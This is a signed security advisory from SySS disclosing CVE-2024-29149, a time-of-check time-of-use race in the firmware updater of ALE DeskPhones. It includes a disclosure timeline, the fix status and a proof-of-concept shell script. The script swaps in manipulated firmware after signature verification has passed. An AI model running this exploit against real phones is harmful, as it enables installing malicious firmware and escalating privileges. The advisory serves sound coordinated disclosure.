-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-010 Product: Alcatel-Lucent ALE DeskPhones Manufacturer: ALE International, ALE USA Inc Affected Version(s): Please see the manufacturer note[4] Tested Version(s): Firmware Versions: 86x8_NOE-R300.1.40.07.4140 86x8_SIP-R200.1.01.10.728 86x8_NOE-R300.1.40.12.4180 Vulnerability Type: Time-of-check Time-of-use (TOCTOU) Race Condition (CWE-367) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-02-19 Solution Date: 2024-05-06 Public Disclosure: 2024-05-06 CVE Reference: CVE-2024-29149 Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ALE DeskPhones are modern desk phones which are used for the operation in enterprise environments. The manufacturer describes the product as follows (see [1]): "Innovative deskphones and digital phones, delivering rich communications in sleek designs, are essential for hybrid work." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Due to a time-of-check time-of-use vulnerability, an authenticated attacker is able to replace the verified firmware image with malicious firmware during the update process of the phone. This allows, e.g., for local privilege escalation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Download manipulated firmware to the "/tmp" directory of the phone with the "admin" (default user) access (e.g., via SSH or via USB debugging (UART)). 2. Download the following script to the phone and execute it. This script waits until the firmware verification of the original firmware is successful and then replaces it with the manipulated firmware: ##################################### #!/bin/sh PROC_NAME="upgrade_check --signature" FLAG="" while true do if [ "$FLAG" ] then if [ "$(ps | grep "$PROC_NAME" | egrep -v 'grep')" ] then continue else echo "[*] Process finished" cat /tmp/sip86x8P-manipulated > /tmp/sip86x8P echo "[+] Image overwritten" break fi fi if [ "$(ps | grep "$PROC_NAME" | egrep -v 'grep')" ] then echo "[*] Signature verification process found" FLAG="1" fi done ##################################### 3. Afterward, the replaced and manipulated firmware will be installed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the devices according to the manufacturer note[4]. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-02-17: Vulnerability discovered 2024-02-19: Vulnerability reported to manufacturer 2024-02-19: Manufacturer confirmed reception 2024-03-04: Asked the manufacturer for status 2024-03-18: CVE-2024-29149 assigned and shared with the manufacturer 2024-03-25: Asked the manufacturer for status 2024-03-28: Update from the manufacturer: Case is still under investigation 2024-03-29: Update form the manufacturer: A fix proposal is made 2024-04-02: Asked the manufacturer for a proposed remediation timeline 2024-04-02: Update from the manufacturer: Manufacturer has reproduction issues 2024-04-02: Proposed a meeting to discuss technical details 2024-04-03: Video call with the manufacturer to discuss technical details 2024-04-02: Update from the manufacturer: Root cause has now been fully understood and a fix is under testing Manufacturer has questions about the details and timeline of the disclosure 2024-04-10: Video call with the manufacturer to discuss the disclosure timeline 2024-04-11: Disclosure timeline proposed and shared with the manufacturer 2024-05-06: Update from the manufacturer: A security advisory will be published today 2024-05-06: Manufacturer published a security advisory[4] 2024-05-07: Public disclosure 2024-07-12: Advisory updated with technical details 2024-07-12: Blog post published[5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] ALE DeskPhones product website https://www.al-enterprise.com/en/products/devices/ale-deskphones [2] SySS Security Advisory SYSS-2024-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-010.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Security advisory published by the manufacturer https://www.al-enterprise.com/-/media/assets/internet/documents/n-to-s/sa-c0071-ed01.pdf [5] Blog post: https://blog.syss.com/posts/voip-deskphone-firmware-security/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmZpQeEACgkQrgyb+PE0 i1NlgA//cqtYqeB3yJjf9VRoFeVeJnpA8saFdSTPMJIal2zLOLmrbjck9W4exh1M Y+0m7m/+nu++mBjx/XILrpgml4ZGv94AFk20XG9EB+aD6FirCKd1m+B18Ik0J1Hl WQisHFHx2rAuZMVzvVOXyw4m9C6zNlSE1TdJytLgtV4woWfNfZyj/Sf6F+9e0N4P 54Hi7qoyr8cctS5kcG+BXp993R30UbPDN8HbysQK0pUDateuahnXi4tDoVE02VbR aL+UWkV9+YKtCvbhyQlR6LGl2CTRLrFEXhtUbSJlpk+tQ1ZL4/oB1fT6FFa3ofRb EZHu8m5Y0fXHzLTVKDckDGFAAh4/LDJLQqQm5SGHBqGKkyiOdwDKbDrqUiQeeRnG Uab78x94mKi5CvCVD6izCWuqtNAOI7qTepUYWer8VW7+1nIp16FphuLOi+SFtxP4 iCUGllPL5OxcLIsEM18slvphqcQcoG1XVghjXDLpSQjXh4YLsf3ADWpvi9YjFIOf h/jau2KUFC6nA8Og3WAJKxrnxiMyOGQvrxJkbfSs+vrnA3mL2gFavpKidU4aXIlg hu3PyB2KqXlaL8lRSBvz6eZIRwPM0lDPKvxwVwfCh0eLfN0dL5R6rZ116dMI7QAL /aIzavuuirhHpnSSPNqcqbF4blXKQJMZjjdMvx7u5d/tuao0XC4= =bYuD -----END PGP SIGNATURE-----